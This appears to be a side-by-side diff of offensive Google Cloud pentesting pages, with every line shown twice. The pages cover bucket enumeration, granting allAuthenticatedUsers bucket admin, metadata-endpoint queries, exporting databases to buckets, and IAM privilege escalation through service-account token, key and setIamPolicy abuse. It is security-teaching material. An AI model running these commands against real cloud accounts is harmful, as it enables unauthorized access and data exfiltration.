* [https://github.com/RhinoSecurityLabs/GCPBucketBrute](https://github.com/RhinoSecurityLabs/GCPBucketBrute) * [https://github.com/RhinoSecurityLabs/GCPBucketBrute](https://github.com/RhinoSecurityLabs/GCPBucketBrute)
### Privilege Escalation # Privilege Escalation
If the bucket policy allowed either “allUsers” or “allAuthenticatedUsers” to **write to their bucket policy** (the **storage.buckets.setIamPolicy** permission)**,** then anyone can modify the bucket policy and grant himself full access. If the bucket policy allowed either “allUsers” or “allAuthenticatedUsers” to **write to their bucket policy** (the **storage.buckets.setIamPolicy** permission)**,** then anyone can modify the bucket policy and grant himself full access.
#### Check Permissions ## Check Permissions
There are 2 ways to check the permissions over a bucket. The first one is to ask for them by making a request to `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam` or running `gsutil iam get gs://BUCKET_NAME`. There are 2 ways to check the permissions over a bucket. The first one is to ask for them by making a request to `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam` or running `gsutil iam get gs://BUCKET_NAME`.
@ -53,7 +52,7 @@ However, if your user (potentially belonging to allUsers or allAuthenticatedUser
The other option which will always work is to use the testPermissions endpoint of the bucket to figure out if you have the specified permission, for example accessing: `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam/testPermissions?permissions=storage.buckets.delete&permissions=storage.buckets.get&permissions=storage.buckets.getIamPolicy&permissions=storage.buckets.setIamPolicy&permissions=storage.buckets.update&permissions=storage.objects.create&permissions=storage.objects.delete&permissions=storage.objects.get&permissions=storage.objects.list&permissions=storage.objects.update` The other option which will always work is to use the testPermissions endpoint of the bucket to figure out if you have the specified permission, for example accessing: `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam/testPermissions?permissions=storage.buckets.delete&permissions=storage.buckets.get&permissions=storage.buckets.getIamPolicy&permissions=storage.buckets.setIamPolicy&permissions=storage.buckets.update&permissions=storage.objects.create&permissions=storage.objects.delete&permissions=storage.objects.get&permissions=storage.objects.list&permissions=storage.objects.update`
#### Escalating ## Escalating
With the “gsutil” Google Storage CLI program, we can run the following command to grant “allAuthenticatedUsers” access to the “Storage Admin” role, thus **escalating the privileges we were granted** to the bucket: With the “gsutil” Google Storage CLI program, we can run the following command to grant “allAuthenticatedUsers” access to the “Storage Admin” role, thus **escalating the privileges we were granted** to the bucket:
@ -63,7 +62,7 @@ gsutil iam ch group:allAuthenticatedUsers:admin gs://BUCKET_NAME
One of the main attractions to escalating from a LegacyBucketOwner to Storage Admin is the ability to use the “storage.buckets.delete” privilege. In theory, you could **delete the bucket after escalating your privileges, then you could create the bucket in your own account to steal the name**. One of the main attractions to escalating from a LegacyBucketOwner to Storage Admin is the ability to use the “storage.buckets.delete” privilege. In theory, you could **delete the bucket after escalating your privileges, then you could create the bucket in your own account to steal the name**.
### References # References
* [https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/](https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/) * [https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/](https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/)

View file

@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# GCP - Buckets Enumeration
Default configurations permit read access to storage. This means that you may **enumerate ALL storage buckets in the project**, including **listing** and **accessing** the contents inside. Default configurations permit read access to storage. This means that you may **enumerate ALL storage buckets in the project**, including **listing** and **accessing** the contents inside.
This can be a MAJOR vector for privilege escalation, as those buckets can contain secrets. This can be a MAJOR vector for privilege escalation, as those buckets can contain secrets.
@ -48,19 +46,19 @@ If you get a permission denied error listing buckets you may still have access t
for i in $(cat wordlist.txt); do gsutil ls -r gs://"$i"; done for i in $(cat wordlist.txt); do gsutil ls -r gs://"$i"; done
``` ```
### Search Open Buckets ## Search Open Buckets
With the following script [gathered from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_misc/-/blob/master/find\_open\_buckets.sh) you can find all the open buckets: With the following script [gathered from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_misc/-/blob/master/find\_open\_buckets.sh) you can find all the open buckets:
```bash ```bash
#!/bin/bash #!/bin/bash
############################# ############################
# Run this tool to find buckets that are open to the public anywhere # Run this tool to find buckets that are open to the public anywhere
# in your GCP organization. # in your GCP organization.
# #
# Enjoy! # Enjoy!
############################# ############################
for proj in $(gcloud projects list --format="get(projectId)"); do for proj in $(gcloud projects list --format="get(projectId)"); do
echo "[*] scraping project $proj" echo "[*] scraping project $proj"

View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# GCP - Compute Enumeration # Compute instances
## Compute instances
It would be interesting if you can **get the zones** the project is using and the **list of all the running instances** and details about each of them. It would be interesting if you can **get the zones** the project is using and the **list of all the running instances** and details about each of them.
@ -33,7 +31,7 @@ The details may include:
```bash ```bash
# Get list of zones # Get list of zones
## It's interesting to know which zones are being used # It's interesting to know which zones are being used
gcloud compute regions list | grep -E "NAME|[^0]/" gcloud compute regions list | grep -E "NAME|[^0]/"
# List compute instances & get info # List compute instances & get info
@ -53,7 +51,7 @@ For more information about how to **SSH** or **modify the metadata** of an insta
[gcp-local-privilege-escalation-ssh-pivoting.md](gcp-local-privilege-escalation-ssh-pivoting.md) [gcp-local-privilege-escalation-ssh-pivoting.md](gcp-local-privilege-escalation-ssh-pivoting.md)
{% endcontent-ref %} {% endcontent-ref %}
### Custom Metadata ## Custom Metadata
Administrators can add [custom metadata](https://cloud.google.com/compute/docs/storing-retrieving-metadata#custom) at the instance and project level. This is simply a way to pass **arbitrary key/value pairs into an instance**, and is commonly used for environment variables and startup/shutdown scripts. This can be obtained using the `describe` method from a command in the previous section, but it could also be retrieved from the inside of the instance accessing the metadata endpoint. Administrators can add [custom metadata](https://cloud.google.com/compute/docs/storing-retrieving-metadata#custom) at the instance and project level. This is simply a way to pass **arbitrary key/value pairs into an instance**, and is commonly used for environment variables and startup/shutdown scripts. This can be obtained using the `describe` method from a command in the previous section, but it could also be retrieved from the inside of the instance accessing the metadata endpoint.
@ -67,7 +65,7 @@ curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?re
-H "Metadata-Flavor: Google" -H "Metadata-Flavor: Google"
``` ```
### Serial Console Logs ## Serial Console Logs
Compute instances may be **writing output from the OS and BIOS to serial ports**. Serial console logs may expose **sensitive information** from the system logs which low privileged user may not usually see, but with the appropriate IAM permissions you may be able to read them. Compute instances may be **writing output from the OS and BIOS to serial ports**. Serial console logs may expose **sensitive information** from the system logs which low privileged user may not usually see, but with the appropriate IAM permissions you may be able to read them.
@ -91,7 +89,7 @@ You can then [export](https://cloud.google.com/sdk/gcloud/reference/compute/imag
$ gcloud compute images list --no-standard-images $ gcloud compute images list --no-standard-images
``` ```
### Local Privilege Escalation and Pivoting ## Local Privilege Escalation and Pivoting
If you compromises a compute instance you should also check the actions mentioned in this page: If you compromises a compute instance you should also check the actions mentioned in this page:
@ -99,9 +97,9 @@ If you compromises a compute instance you should also check the actions mentione
[gcp-local-privilege-escalation-ssh-pivoting.md](gcp-local-privilege-escalation-ssh-pivoting.md) [gcp-local-privilege-escalation-ssh-pivoting.md](gcp-local-privilege-escalation-ssh-pivoting.md)
{% endcontent-ref %} {% endcontent-ref %}
## Images # Images
### Custom Images ## Custom Images
**Custom compute images may contain sensitive details** or other vulnerable configurations that you can exploit. You can query the list of non-standard images in a project with the following command: **Custom compute images may contain sensitive details** or other vulnerable configurations that you can exploit. You can query the list of non-standard images in a project with the following command:
@ -127,7 +125,7 @@ gcloud compute images list --project windows-cloud --no-standard-images #non-Shi
gcloud compute images list --project gce-uefi-images --no-standard-images #available Shielded VM images, including Windows images gcloud compute images list --project gce-uefi-images --no-standard-images #available Shielded VM images, including Windows images
``` ```
### Custom Instance Templates ## Custom Instance Templates
An [instance template](https://cloud.google.com/compute/docs/instance-templates/) defines instance properties to help deploy consistent configurations. These may contain the same types of sensitive data as a running instance's custom metadata. You can use the following commands to investigate: An [instance template](https://cloud.google.com/compute/docs/instance-templates/) defines instance properties to help deploy consistent configurations. These may contain the same types of sensitive data as a running instance's custom metadata. You can use the following commands to investigate:
@ -139,7 +137,7 @@ $ gcloud compute instance-templates list
$ gcloud compute instance-templates describe [TEMPLATE NAME] $ gcloud compute instance-templates describe [TEMPLATE NAME]
``` ```
## More Enumeration # More Enumeration
| Description | Command | | Description | Command |
| ---------------------- | --------------------------------------------------------------------------------------------------------- | | ---------------------- | --------------------------------------------------------------------------------------------------------- |

View file

@ -17,15 +17,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# GCP - Databases Enumeration
Google has [a handful of database technologies](https://cloud.google.com/products/databases/) that you may have access to via the default service account or another set of credentials you have compromised thus far. Google has [a handful of database technologies](https://cloud.google.com/products/databases/) that you may have access to via the default service account or another set of credentials you have compromised thus far.
Databases will usually contain interesting information, so it would be completely recommended to check them. Each database type provides various **`gcloud` commands to export the data**. This typically involves **writing the database to a cloud storage bucket first**, which you can then download. It may be best to use an existing bucket you already have access to, but you can also create your own if you want. Databases will usually contain interesting information, so it would be completely recommended to check them. Each database type provides various **`gcloud` commands to export the data**. This typically involves **writing the database to a cloud storage bucket first**, which you can then download. It may be best to use an existing bucket you already have access to, but you can also create your own if you want.
As an example, you can follow [Google's documentation](https://cloud.google.com/sql/docs/mysql/import-export/exporting) to exfiltrate a Cloud SQL database. As an example, you can follow [Google's documentation](https://cloud.google.com/sql/docs/mysql/import-export/exporting) to exfiltrate a Cloud SQL database.
### [Cloud SQL](https://cloud.google.com/sdk/gcloud/reference/sql/) ## [Cloud SQL](https://cloud.google.com/sdk/gcloud/reference/sql/)
Cloud SQL instances are **fully managed, relational MySQL, PostgreSQL and SQL Server databases**. Google handles replication, patch management and database management to ensure availability and performance.[Learn more](https://cloud.google.com/sql/docs/) Cloud SQL instances are **fully managed, relational MySQL, PostgreSQL and SQL Server databases**. Google handles replication, patch management and database management to ensure availability and performance.[Learn more](https://cloud.google.com/sql/docs/)
@ -39,7 +37,7 @@ gcloud sql backups list --instance [INSTANCE]
gcloud sql export sql <DATABASE_INSTANCE> gs://<CLOUD_STORAGE_BUCKET>/cloudsql/export.sql.gz --database <DATABASE_NAME> gcloud sql export sql <DATABASE_INSTANCE> gs://<CLOUD_STORAGE_BUCKET>/cloudsql/export.sql.gz --database <DATABASE_NAME>
``` ```
### [Cloud Spanner](https://cloud.google.com/sdk/gcloud/reference/spanner/) ## [Cloud Spanner](https://cloud.google.com/sdk/gcloud/reference/spanner/)
Fully managed relational database with unlimited scale, strong consistency, and up to 99.999% availability. Fully managed relational database with unlimited scale, strong consistency, and up to 99.999% availability.
@ -50,7 +48,7 @@ gcloud spanner databases list --instance [INSTANCE]
gcloud spanner backups list --instance [INSTANCE] gcloud spanner backups list --instance [INSTANCE]
``` ```
### [Cloud Bigtable](https://cloud.google.com/sdk/gcloud/reference/bigtable/) <a href="#cloud-bigtable" id="cloud-bigtable"></a> ## [Cloud Bigtable](https://cloud.google.com/sdk/gcloud/reference/bigtable/) <a href="#cloud-bigtable" id="cloud-bigtable"></a>
A fully managed, scalable NoSQL database service for large analytical and operational workloads with up to 99.999% availability. [Learn more](https://cloud.google.com/bigtable). A fully managed, scalable NoSQL database service for large analytical and operational workloads with up to 99.999% availability. [Learn more](https://cloud.google.com/bigtable).
@ -61,7 +59,7 @@ gcloud bigtable clusters list
gcloud bigtable backups list --instance [INSTANCE] gcloud bigtable backups list --instance [INSTANCE]
``` ```
### [Cloud Firestore](https://cloud.google.com/sdk/gcloud/reference/firestore/) ## [Cloud Firestore](https://cloud.google.com/sdk/gcloud/reference/firestore/)
Cloud Firestore is a flexible, scalable database for mobile, web, and server development from Firebase and Google Cloud. Like Firebase Realtime Database, it keeps your data in sync across client apps through realtime listeners and offers offline support for mobile and web so you can build responsive apps that work regardless of network latency or Internet connectivity. Cloud Firestore also offers seamless integration with other Firebase and Google Cloud products, including Cloud Functions. [Learn more](https://firebase.google.com/docs/firestore). Cloud Firestore is a flexible, scalable database for mobile, web, and server development from Firebase and Google Cloud. Like Firebase Realtime Database, it keeps your data in sync across client apps through realtime listeners and offers offline support for mobile and web so you can build responsive apps that work regardless of network latency or Internet connectivity. Cloud Firestore also offers seamless integration with other Firebase and Google Cloud products, including Cloud Functions. [Learn more](https://firebase.google.com/docs/firestore).
@ -71,11 +69,11 @@ gcloud firestore indexes fields list
gcloud firestore export gs://my-source-project-export/export-20190113_2109 --collection-ids='cameras','radios' gcloud firestore export gs://my-source-project-export/export-20190113_2109 --collection-ids='cameras','radios'
``` ```
### [Firebase](https://cloud.google.com/sdk/gcloud/reference/firebase/) ## [Firebase](https://cloud.google.com/sdk/gcloud/reference/firebase/)
The Firebase Realtime Database is a cloud-hosted NoSQL database that lets you store and sync data between your users in realtime. [Learn more](https://firebase.google.com/products/realtime-database/). The Firebase Realtime Database is a cloud-hosted NoSQL database that lets you store and sync data between your users in realtime. [Learn more](https://firebase.google.com/products/realtime-database/).
### Memorystore ## Memorystore
Reduce latency with scalable, secure, and highly available in-memory service for [**Redis**](https://cloud.google.com/sdk/gcloud/reference/redis) and [**Memcached**](https://cloud.google.com/sdk/gcloud/reference/memcache). Learn more. Reduce latency with scalable, secure, and highly available in-memory service for [**Redis**](https://cloud.google.com/sdk/gcloud/reference/redis) and [**Memcached**](https://cloud.google.com/sdk/gcloud/reference/memcache). Learn more.
@ -87,7 +85,7 @@ gcloud redis instances list --region [region]
gcloud redis instances export gs://my-bucket/my-redis-instance.rdb my-redis-instance --region=us-central1 gcloud redis instances export gs://my-bucket/my-redis-instance.rdb my-redis-instance --region=us-central1
``` ```
### [Bigquery](https://cloud.google.com/bigquery/docs/bq-command-line-tool) ## [Bigquery](https://cloud.google.com/bigquery/docs/bq-command-line-tool)
BigQuery is a fully-managed enterprise data warehouse that helps you manage and analyze your data with built-in features like machine learning, geospatial analysis, and business intelligence. BigQuerys serverless architecture lets you use SQL queries to answer your organizations biggest questions with zero infrastructure management. BigQuerys scalable, distributed analysis engine lets you query terabytes in seconds and petabytes in minutes. [Learn more](https://cloud.google.com/bigquery/docs/introduction). BigQuery is a fully-managed enterprise data warehouse that helps you manage and analyze your data with built-in features like machine learning, geospatial analysis, and business intelligence. BigQuerys serverless architecture lets you use SQL queries to answer your organizations biggest questions with zero infrastructure management. BigQuerys scalable, distributed analysis engine lets you query terabytes in seconds and petabytes in minutes. [Learn more](https://cloud.google.com/bigquery/docs/introduction).

View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# GCP - Abuse GCP Permissions # Introduction to GCP Privilege Escalation <a href="#introduction-to-gcp-privilege-escalation" id="introduction-to-gcp-privilege-escalation"></a>
## Introduction to GCP Privilege Escalation <a href="#introduction-to-gcp-privilege-escalation" id="introduction-to-gcp-privilege-escalation"></a>
GCP, as any other cloud, have some **principals**: users, groups and service accounts, and some **resources** like compute engine, cloud functions…\ GCP, as any other cloud, have some **principals**: users, groups and service accounts, and some **resources** like compute engine, cloud functions…\
Then, via roles, **permissions are granted to those principals over the resources**. This is the way to specify the permissions a principal has over a resource in GCP.\ Then, via roles, **permissions are granted to those principals over the resources**. This is the way to specify the permissions a principal has over a resource in GCP.\
@ -41,7 +39,7 @@ It's important to note also that in **GCP Service Accounts are both principals a
The permissions between parenthesis indicate the permissions needed to exploit the vulnerability with `gcloud`. Those might not be needed if exploiting it through the API. The permissions between parenthesis indicate the permissions needed to exploit the vulnerability with `gcloud`. Those might not be needed if exploiting it through the API.
{% endhint %} {% endhint %}
## Privilege Escalation to Principals # Privilege Escalation to Principals
Check all the **known permissions** that will allow you to **escalate privileges over other principals** in: Check all the **known permissions** that will allow you to **escalate privileges over other principals** in:
@ -49,7 +47,7 @@ Check all the **known permissions** that will allow you to **escalate privileges
[gcp-privesc-to-other-principals.md](gcp-privesc-to-other-principals.md) [gcp-privesc-to-other-principals.md](gcp-privesc-to-other-principals.md)
{% endcontent-ref %} {% endcontent-ref %}
## Privilege Escalation to Resources # Privilege Escalation to Resources
Check all the **known permissions** that will allow you to **escalate privileges over other resources** in: Check all the **known permissions** that will allow you to **escalate privileges over other resources** in:
@ -57,7 +55,7 @@ Check all the **known permissions** that will allow you to **escalate privileges
[gcp-privesc-to-resources.md](gcp-privesc-to-resources.md) [gcp-privesc-to-resources.md](gcp-privesc-to-resources.md)
{% endcontent-ref %} {% endcontent-ref %}
## #
<details> <details>

View file

@ -17,16 +17,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# GCP - Privesc to other Principals
{% hint style="info" %} {% hint style="info" %}
GCP has **hundreds of permissions**. This is just a list containing the **known** ones that could allow you to escalate to other principals.\ GCP has **hundreds of permissions**. This is just a list containing the **known** ones that could allow you to escalate to other principals.\
If you know about any other permissions not mentioned here, **please send a PR to add it** or let me know and I will add it. If you know about any other permissions not mentioned here, **please send a PR to add it** or let me know and I will add it.
{% endhint %} {% endhint %}
## IAM # IAM
### iam.roles.update (iam.roles.get) ## iam.roles.update (iam.roles.get)
If you have the mentioned permissions you will be able to update a role assigned to you and give you extra permissions to other resources like: If you have the mentioned permissions you will be able to update a role assigned to you and give you extra permissions to other resources like:
@ -36,13 +34,13 @@ gcloud iam roldes update <rol name> --project <project> --add-permissions <permi
You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](gcp-privesc-to-other-principals.md#deploymentmanager) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.roles.update.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/). You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](gcp-privesc-to-other-principals.md#deploymentmanager) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.roles.update.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
### iam.serviceAccounts.getAccessToken (iam.serviceAccounts.get) ## iam.serviceAccounts.getAccessToken (iam.serviceAccounts.get)
This permission allows to **request an access token that belongs to a Service Account**, so it's possible to request an access token of a Service Account with more privileges than ours. This permission allows to **request an access token that belongs to a Service Account**, so it's possible to request an access token of a Service Account with more privileges than ours.
You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/4-iam.serviceAccounts.getAccessToken.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getAccessToken.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/). You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/4-iam.serviceAccounts.getAccessToken.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getAccessToken.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
### iam.serviceAccountKeys.create ## iam.serviceAccountKeys.create
This permission allows us to do something similar to the previous method, but instead of an access token, we are **creating a user-managed key for a Service Account**, which will allow us to access GCP as that Service Account. This permission allows us to do something similar to the previous method, but instead of an access token, we are **creating a user-managed key for a Service Account**, which will allow us to access GCP as that Service Account.
@ -54,7 +52,7 @@ You can find a script to automate the [**creation, exploit and cleaning of a vul
Note that **iam.serviceAccountKeys.update won't work to modify the key** of a SA because to do that the permissions iam.serviceAccountKeys.create is also needed. Note that **iam.serviceAccountKeys.update won't work to modify the key** of a SA because to do that the permissions iam.serviceAccountKeys.create is also needed.
### iam.serviceAccounts.implicitDelegation ## iam.serviceAccounts.implicitDelegation
If you have the _**iam.serviceAccounts.implicitDelegation**_** permission on a Service Account** that has the _**iam.serviceAccounts.getAccessToken**_** permission on a third Service Account**, then you can use implicitDelegation to **create a token for that third Service Account**. Here is a diagram to help explain. If you have the _**iam.serviceAccounts.implicitDelegation**_** permission on a Service Account** that has the _**iam.serviceAccounts.getAccessToken**_** permission on a third Service Account**, then you can use implicitDelegation to **create a token for that third Service Account**. Here is a diagram to help explain.
@ -64,19 +62,19 @@ You can find a script to automate the [**creation, exploit and cleaning of a vul
Note that according to the [**documentation**](https://cloud.google.com/iam/docs/understanding-service-accounts), the delegation only works to generate a token using the [**generateAccessToken()**](https://cloud.google.com/iam/credentials/reference/rest/v1/projects.serviceAccounts/generateAccessToken) method. Note that according to the [**documentation**](https://cloud.google.com/iam/docs/understanding-service-accounts), the delegation only works to generate a token using the [**generateAccessToken()**](https://cloud.google.com/iam/credentials/reference/rest/v1/projects.serviceAccounts/generateAccessToken) method.
### iam.serviceAccounts.signBlob ## iam.serviceAccounts.signBlob
The _iam.serviceAccounts.signBlob_ permission “allows signing of arbitrary payloads” in GCP. This means we can **create an unsigined JWT of the SA and then send it as a blob to get the JWT signed** by the SA we are targeting. For more information [**read this**](https://medium.com/google-cloud/using-serviceaccountactor-iam-role-for-account-impersonation-on-google-cloud-platform-a9e7118480ed). The _iam.serviceAccounts.signBlob_ permission “allows signing of arbitrary payloads” in GCP. This means we can **create an unsigined JWT of the SA and then send it as a blob to get the JWT signed** by the SA we are targeting. For more information [**read this**](https://medium.com/google-cloud/using-serviceaccountactor-iam-role-for-account-impersonation-on-google-cloud-platform-a9e7118480ed).
You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/6-iam.serviceAccounts.signBlob.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signBlob-accessToken.py) and [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signBlob-gcsSignedUrl.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/). You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/6-iam.serviceAccounts.signBlob.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signBlob-accessToken.py) and [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signBlob-gcsSignedUrl.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
### iam.serviceAccounts.signJwt ## iam.serviceAccounts.signJwt
Similar to how the previous method worked by signing arbitrary payloads, this method works by signing well-formed JSON web tokens (JWTs). The difference with the previous method is that **instead of making google sign a blob containing a JWT, we use the signJWT method that already expects a JWT**. This makes it easier to use but you can only sign JWT instead of any bytes. Similar to how the previous method worked by signing arbitrary payloads, this method works by signing well-formed JSON web tokens (JWTs). The difference with the previous method is that **instead of making google sign a blob containing a JWT, we use the signJWT method that already expects a JWT**. This makes it easier to use but you can only sign JWT instead of any bytes.
You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/7-iam.serviceAccounts.signJWT.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signJWT.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/). You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/7-iam.serviceAccounts.signJWT.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signJWT.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
### iam.serviceAccounts.setIamPolicy <a href="#iam.serviceaccounts.setiampolicy" id="iam.serviceaccounts.setiampolicy"></a> ## iam.serviceAccounts.setIamPolicy <a href="#iam.serviceaccounts.setiampolicy" id="iam.serviceaccounts.setiampolicy"></a>
This permission allows to **add IAM policies to service accounts**. You can abuse it to **grant yourself** the permissions you need to impersonate the service account. In the following example we are granting ourselves the “roles/iam.serviceAccountTokenCreator” role over the interesting SA: This permission allows to **add IAM policies to service accounts**. You can abuse it to **grant yourself** the permissions you need to impersonate the service account. In the following example we are granting ourselves the “roles/iam.serviceAccountTokenCreator” role over the interesting SA:
@ -88,13 +86,13 @@ gcloud iam service-accounts add-iam-policy-binding "${VICTIM_SA}@${PROJECT_ID}.i
You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/d-iam.serviceAccounts.setIamPolicy.sh)**.** You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/d-iam.serviceAccounts.setIamPolicy.sh)**.**
### iam.serviceAccounts.actAs ## iam.serviceAccounts.actAs
This means that as part of creating certain resources, you must “actAs” the Service Account for the call to complete successfully. For example, when starting a new Compute Engine instance with an attached Service Account, you need _iam.serviceAccounts.actAs_ on that Service Account. This is because without that permission, users could escalate permissions with fewer permissions to start with. This means that as part of creating certain resources, you must “actAs” the Service Account for the call to complete successfully. For example, when starting a new Compute Engine instance with an attached Service Account, you need _iam.serviceAccounts.actAs_ on that Service Account. This is because without that permission, users could escalate permissions with fewer permissions to start with.
**There are multiple individual methods that use \_iam.serviceAccounts.actAs**\_**, so depending on your own permissions, you may only be able to exploit one (or more) of these methods below**. These methods are slightly different in that they **require multiple permissions to exploit, rather than a single permission** like all of the previous methods. **There are multiple individual methods that use \_iam.serviceAccounts.actAs**\_**, so depending on your own permissions, you may only be able to exploit one (or more) of these methods below**. These methods are slightly different in that they **require multiple permissions to exploit, rather than a single permission** like all of the previous methods.
### iam.serviceAccounts.getOpenIdToken ## iam.serviceAccounts.getOpenIdToken
This permission can be used to generate an OpenID JWT. These are used to assert identity and do not necessarily carry any implicit authorization against a resource. This permission can be used to generate an OpenID JWT. These are used to assert identity and do not necessarily carry any implicit authorization against a resource.
@ -124,23 +122,23 @@ Some services that support authentication via this kind of tokens are:
You can find an example on how to create and OpenID token behalf a service account [**here**](https://github.com/carlospolop-forks/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getOpenIdToken.py). You can find an example on how to create and OpenID token behalf a service account [**here**](https://github.com/carlospolop-forks/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getOpenIdToken.py).
## resourcemanager # resourcemanager
### resourcemanager.organizations.setIamPolicy ## resourcemanager.organizations.setIamPolicy
Like in the exploitation of [**iam.serviceAccounts.setIamPolicy**](gcp-privesc-to-other-principals.md#iam.serviceaccounts.setiampolicy), this permission allows you to **modify** your **permissions** against **any resource** at **organization** level. So, you can follow the same exploitation example. Like in the exploitation of [**iam.serviceAccounts.setIamPolicy**](gcp-privesc-to-other-principals.md#iam.serviceaccounts.setiampolicy), this permission allows you to **modify** your **permissions** against **any resource** at **organization** level. So, you can follow the same exploitation example.
### resourcemanager.folders.setIamPolicy ## resourcemanager.folders.setIamPolicy
Like in the exploitation of [**iam.serviceAccounts.setIamPolicy**](gcp-privesc-to-other-principals.md#iam.serviceaccounts.setiampolicy), this permission allows you to **modify** your **permissions** against **any resource** at **folder** level. So, you can follow the same exploitation example. Like in the exploitation of [**iam.serviceAccounts.setIamPolicy**](gcp-privesc-to-other-principals.md#iam.serviceaccounts.setiampolicy), this permission allows you to **modify** your **permissions** against **any resource** at **folder** level. So, you can follow the same exploitation example.
### resourcemanager.projects.setIamPolicy ## resourcemanager.projects.setIamPolicy
Like in the exploitation of [**iam.serviceAccounts.setIamPolicy**](gcp-privesc-to-other-principals.md#iam.serviceaccounts.setiampolicy), this permission allows you to **modify** your **permissions** against **any resource** at **project** level. So, you can follow the same exploitation example. Like in the exploitation of [**iam.serviceAccounts.setIamPolicy**](gcp-privesc-to-other-principals.md#iam.serviceaccounts.setiampolicy), this permission allows you to **modify** your **permissions** against **any resource** at **project** level. So, you can follow the same exploitation example.
## deploymentmanager # deploymentmanager
### deploymentmanager.deployments.create ## deploymentmanager.deployments.create
This single permission lets you **launch new deployments** of resources into GCP with arbitrary service accounts. You could for example launch a compute instance with a SA to escalate to it. This single permission lets you **launch new deployments** of resources into GCP with arbitrary service accounts. You could for example launch a compute instance with a SA to escalate to it.
@ -148,19 +146,19 @@ You could actually **launch any resource** listed in `gcloud deployment-manager
